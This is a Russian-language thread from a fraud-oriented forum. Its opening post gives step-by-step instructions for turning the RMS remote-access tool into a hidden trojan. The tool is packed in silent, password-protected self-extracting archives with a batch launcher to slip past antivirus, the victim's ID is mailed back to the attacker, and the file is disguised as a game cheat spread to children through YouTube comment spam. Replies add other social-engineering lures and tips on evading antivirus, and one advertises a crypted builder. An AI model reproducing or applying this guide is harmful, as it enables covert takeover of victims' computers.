КАК СОЗДАТЬ RMS ВИРУС И НАБРАТЬ ЮЗЕРОВ

Тема в разделе "Гайды / Способы", создана пользователем Galim129, 12.06.2017.

  1. Galim129
    Galim129

    234

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    09.06.2017
    Сообщения:
    25
    Репутация:
    +10 / -1
    Обратите внимание, если Вы хотите провести сделку с данным пользователем, на то, что он заблокирован.
    Всем привет, хочу поделиться опытом как лично я набирал юзеров в RMS.
    Для начала нам нужно создать сам "вирус" который вы будете кидать наивным пользователям
    (все файлы нужные для создания приложу)
    Что бы посмотреть ссылку войдите или зарегистрируйтесь вот ссылочка на нужные файлы
    распаковываем архив Что бы посмотреть ссылку войдите или зарегистрируйтесь
    далее открываем файл RG [rat-club.ru].exe и вводим свой адрес эл.почты куда будут приходить id пользователей Что бы посмотреть ссылку войдите или зарегистрируйтесь
    и нажимаем сохранить
    открывается папка с файлом regedit.reg Что бы посмотреть ссылку войдите или зарегистрируйтесь
    далее копируем этот файл в папку "Новая папка" которая шла в архиве Что бы посмотреть ссылку войдите или зарегистрируйтесь
    теперь выделяем все файлы которые есть в "Новой папке" нажимаем ПКМ - добавить в архив
    Что бы посмотреть ссылку войдите или зарегистрируйтесь
    Далее галочку на создать SFX архив
    Метод сжатия ставим максимальный
    Что бы посмотреть ссылку войдите или зарегистрируйтесь
    Во вкладке "дополнительно" нажимаем параметры SFX
    Что бы посмотреть ссылку войдите или зарегистрируйтесь
    Указываем путь для распаковки у меня это будет C:\Program Files\Windows
    Что бы посмотреть ссылку войдите или зарегистрируйтесь
    Во вкладке "Установка" пишем install.vbs
    Что бы посмотреть ссылку войдите или зарегистрируйтесь
    Далее вкладка "Режимы" нажимаем скрыть все
    (далее скринов не смог добавить так что буду оставлять ссылки на скрин) Что бы посмотреть ссылку войдите или зарегистрируйтесь
    Во вкладке "Обновление" ставим "извлечь и обновить файлы" и "перезаписывать все файлы без запроса" Что бы посмотреть ссылку войдите или зарегистрируйтесь
    Далее просто нажимаем везде "ок"
    У нас появился файл "Новая папка.exe" Что бы посмотреть ссылку войдите или зарегистрируйтесь
    По сути это уже готовый файл который можно отправлять своим жертвам
    Но антивирус будет его удалять, а нам это не нужно.
    Нам нужно чтобы антивирус не палил наш файл для этого нужно проделать следующие действия.
    Берем наш файл "Новая папка.exe"
    ПКМ по нему- добавить в архив Что бы посмотреть ссылку войдите или зарегистрируйтесь
    Далее нажимаем - Создать SFX архив, создать непрерывный архив, заблокировать архив
    и метод сжатия ставим максимальный Что бы посмотреть ссылку войдите или зарегистрируйтесь
    Далее "Дополнительно"- "Парметры SFX"
    Пишем в "путь" %temp% и галочку на "сохранять и восстанавливать пути"
    Что бы посмотреть ссылку войдите или зарегистрируйтесь
    Далее во вкладке "установка" пишем Новая папка.exehttp://pastenow.ru/1RCO8
    Вкладка "режимы" ставим галочку "скрыть все"
    Во вкладке "обновление" галочки на "извлечь и заменить файл" и "перезаписывать все файлы без запроса"
    нажимаем "ок"
    Далее во вкладке общие нажимаем установить пароль у меня это 12345
    Что бы посмотреть ссылку войдите или зарегистрируйтесь
    нажимаем "ок"
    у нас появляется архив 123.exe (зависит от того какое название указали)
    Далее нам нужно создать батник
    создаем текстовый документ Что бы посмотреть ссылку войдите или зарегистрируйтесь
    открываем его и пишем 123.exe( это зависит от того как вы назвали файл) -p12345 (пароль который мы указали в архиве) -d%temp%
    сохраняем наш файл и называем его 1.bat
    Что бы посмотреть ссылку войдите или зарегистрируйтесь
    Выделяем наш файл и батник и добавляем в архив
    ставим создать sfx архив, создать непрерывный архив, заблокировать архив
    метод сжатия максимальный
    назову файл Tanki_cheat.exe (якобы читы на танки онлайн)
    Что бы посмотреть ссылку войдите или зарегистрируйтесь
    далее во вкладке "Дополнительно" - "Параметры SFX"-
    во вкладке общие ничего не пишем
    во вкладке "Установка" пишем 1.bat
    во вкладке "Режимы" галочку на скрыть все
    во вкладке "Обновление" ставим "извлечь и заменить все файлы" и "перезаписывать все файлы без запроса"
    Далее чтоб наш файл был более "безпалевным" поставим иконку танков
    Переходим во вкадку "Текст и графика"
    нажимаем загрузить значок SFX из файла Что бы посмотреть ссылку войдите или зарегистрируйтесь
    выбираем наш значок в с расширением ico их можно найти в интернете Что бы посмотреть ссылку войдите или зарегистрируйтесь

    и везде нажимаем "ок"
    у нас появляется вот такой симпатичный файл Что бы посмотреть ссылку войдите или зарегистрируйтесь
    далее заливаем этот файл на яндекс диск
    ищем на ютубе видео про чит на танки онлайн
    и спамим в комментах
    пишем комменты типа "ребят перезалил файл на яндекс диск пользуйтесь (и вставляете свою ссылку)
    далее наивные школоло качают и запускают наш файл и к нам на почту приходит сообщение с id пользователя который мы копируем и вставляем в наш RMS VIEWER вот ссылочка на него Что бы посмотреть ссылку войдите или зарегистрируйтесь (вирусов нет если не верите можете найти его сами в интернете)
    пароль для подключения в RMS VIEWER - 12345
    вот собственно и все
    P.S. сорян за багнутые скрины
     

    Вложения:

    • 1.jpg
      1.jpg
      Размер файла:
      533.6 КБ
      Просмотров:
      314
    • 23..jpg
      23..jpg
      Размер файла:
      528.2 КБ
      Просмотров:
      258
    • 2.jpg
      2.jpg
      Размер файла:
      544.8 КБ
      Просмотров:
      242
    • 3.jpg
      3.jpg
      Размер файла:
      544.8 КБ
      Просмотров:
      213
    • 4.jpg
      4.jpg
      Размер файла:
      487.5 КБ
      Просмотров:
      216
    • 5.jpg
      5.jpg
      Размер файла:
      525.8 КБ
      Просмотров:
      237
    • 6.jpg
      6.jpg
      Размер файла:
      524.9 КБ
      Просмотров:
      199
    • 7.jpg
      7.jpg
      Размер файла:
      515.6 КБ
      Просмотров:
      177
    • 8.jpg
      8.jpg
      Размер файла:
      512.7 КБ
      Просмотров:
      187
    • 9.jpg
      9.jpg
      Размер файла:
      513.6 КБ
      Просмотров:
      242
    Последнее редактирование: 04.07.2017
    • Нравится Нравится x 3
  2. NoProXack
    NoProXack

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    20.05.2017
    Сообщения:
    1
    Репутация:
    +0 / -1
    Так ведь палится все это дело, на легке не пройдет.) Но школоту можно изловить. Кстати по ссылке пусто, перезалить бы дружище, может кому сгодится.
     
    • Не нравится Не нравится x 1
  3. Germany69
    Germany69

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    14.03.2017
    Сообщения:
    80
    Репутация:
    +25 / -0
    Ты забыл отметить, что youtube в последнее время жестко банит за ссылки. В 90% случаев твой коммент с ссылкой и 5 минут не продержится.
     
  4. Rx24
    Rx24

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    31.12.2016
    Сообщения:
    118
    Репутация:
    +20 / -3
    Такое только со школьниками сойдёт.
     
    • Не нравится Не нравится x 1
  5. Шамиль1994
    Шамиль1994

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    21.03.2017
    Сообщения:
    128
    Репутация:
    +48 / -2
    Чет не приходит айпишник
     
  6. Шамиль1994
    Шамиль1994

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    21.03.2017
    Сообщения:
    128
    Репутация:
    +48 / -2
    Мой косяк, теперь приходит
    Но там все равно надо подтверждать новую папку.ехе
     
  7. Tigr24/7
    Tigr24/7

    vip

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    07.04.2017
    Сообщения:
    236
    Репутация:
    +138 / -3
    Вы ошибаетесь.Сам сделал такой вирус по видео Овера.Ко мне пришла идея распространения этого вируса.Я начал спамить в группах :продам авто бпан итп; текст:Имеется программа для пробива номеров ,написана собственноручно,писать в лс.Я получал просьбы скинуть эту прогу в лс.Объяснял так:нужно запустить этот архив и программа сама распакуется.Потом мне писали: Что за хрень, почему не работает?-Мой ответ:Я хз ,у всех работает.Далее люди просто забивали на это,а у меня был доступ к их компу.Что не понятно,пишите в лс.
     
    • Нравится Нравится x 1
  8. Вудеркид
    Вудеркид

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    10.03.2017
    Сообщения:
    248
    Репутация:
    +134 / -0
    Спасибо, объяснил понятнее чем овер на своих ведосах.
    Как реагирует антивирус в итоге на этот файл?
     
  9. Tigr24/7
    Tigr24/7

    vip

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    07.04.2017
    Сообщения:
    236
    Репутация:
    +138 / -3
    Я авастом сканил и всё норм.
     
  10. Galim129
    Galim129

    234

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    09.06.2017
    Сообщения:
    25
    Репутация:
    +10 / -1
    Обратите внимание, если Вы хотите провести сделку с данным пользователем, на то, что он заблокирован.
    да плюс в том что люди соглашаются на запуск программы и дальше просто ничего не происходит
    большинство людей ничего не заподозрят и подумают что просто программная ошибка, не подходит к ним и т.д.
     
  11. Tigr24/7
    Tigr24/7

    vip

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    07.04.2017
    Сообщения:
    236
    Репутация:
    +138 / -3
    Ведь антивирус не имеет доступа к эксешнику.
     
  12. Galim129
    Galim129

    234

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    09.06.2017
    Сообщения:
    25
    Репутация:
    +10 / -1
    Обратите внимание, если Вы хотите провести сделку с данным пользователем, на то, что он заблокирован.
    пишут что вирус 360 total
    касперский пишет что не вирус а возможная угроза
    на других не проверял но большинство антивирусов не палят его
     
  13. Вудеркид
    Вудеркид

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    10.03.2017
    Сообщения:
    248
    Репутация:
    +134 / -0
    На вт в любом случае подобные файлы уже сливали. Меня интересует аваст обойти в данный момент.
    Сейчас по мануалу все проделаю, отпишу
     
  14. Galim129
    Galim129

    234

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    09.06.2017
    Сообщения:
    25
    Репутация:
    +10 / -1
    Обратите внимание, если Вы хотите провести сделку с данным пользователем, на то, что он заблокирован.
    антивирусы не палят сам файл
    но некоторые начинают возникать когда запускаешь его
    думаю если сделать как говорил овер в своем видео и батник переделать в ехе файл и закриптовать то антивирусы не будут его палить
     
    • Не нравится Не нравится x 1
  15. Xainekon
    Xainekon

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    13.05.2017
    Сообщения:
    69
    Репутация:
    +8 / -0
    Зачастую они даже не всплывают)
     
  16. Fructose
    Fructose

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    21.06.2017
    Сообщения:
    17
    Репутация:
    +5 / -0
    Нихрена подобного ,мои комменты с ссылками досихпор висят
     
  17. Fructose
    Fructose

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    21.06.2017
    Сообщения:
    17
    Репутация:
    +5 / -0
    Такой крипт примечателен тем ,что никакой антивирус не способен спалить его пока он зашифрован под паролем ,но после распаковки особенно ,если вирус не FUD ,то антивирус может спалить вирус
     
  18. Moni
    Moni

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    25.09.2017
    Сообщения:
    1
    Репутация:
    +0 / -0
    работает ли этот вирус с 8 и10 windows также скрытно как и с 7 windows
     
  19. Drlavcraft
    Drlavcraft

    234

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    29.08.2017
    Сообщения:
    2
    Репутация:
    +0 / -1
    Обратите внимание, если Вы хотите провести сделку с данным пользователем, на то, что он заблокирован.
    Палевность огромная, 95 % АВ просто сожрут файл при открытии, кому нужен криптованый билдер или крякнутая прога дениски(если кто знает рмс бокс) то пишите в телегу @Lavcraftdr
     
    • Не нравится Не нравится x 1
  20. жека696
    жека696

    123

    Депозит:
    0 р.
    Гарант сделок:
    0
    Статус:
    Оффлайн
    Регистрация:
    21.11.2017
    Сообщения:
    3
    Репутация:
    +1 / -0
    Сделал все как нужно! Все норм, все работает! НО! Его палит UAC! Можно ли как то это исправить?
     
Похожие темы
  1. Sm1L3r
    Ответов:
    0
    Просмотров:
    507
  2. Shame
    Ответов:
    3
    Просмотров:
    993
  3. maximalno
    Ответов:
    1
    Просмотров:
    269
  4. Mekeema
    Ответов:
    0
    Просмотров:
    217
  5. Devstroke
    Ответов:
    1
    Просмотров:
    214
Загрузка...
  • О НАС

    DarkWebs.ws — форум, посвященный вопросам заработка в интернете, различные схемы мошенников, IT вопросам и многое другое. Это форум о заработке в сети интернет.

  • FAQ

  • ОТВЕТСТВЕННОСТЬ

    Администрация не несет никакой ответственности за публикации на данном форуме. Если Вы считаете, что в темах и сообщениях может содержаться информация, запрещенная к распространению, просим незамедлительно сообщить Администрации.

    Abuse email: abuse@darkwebs.ws

  • ПАРТНЕРЫ

    Яндекс.Метрика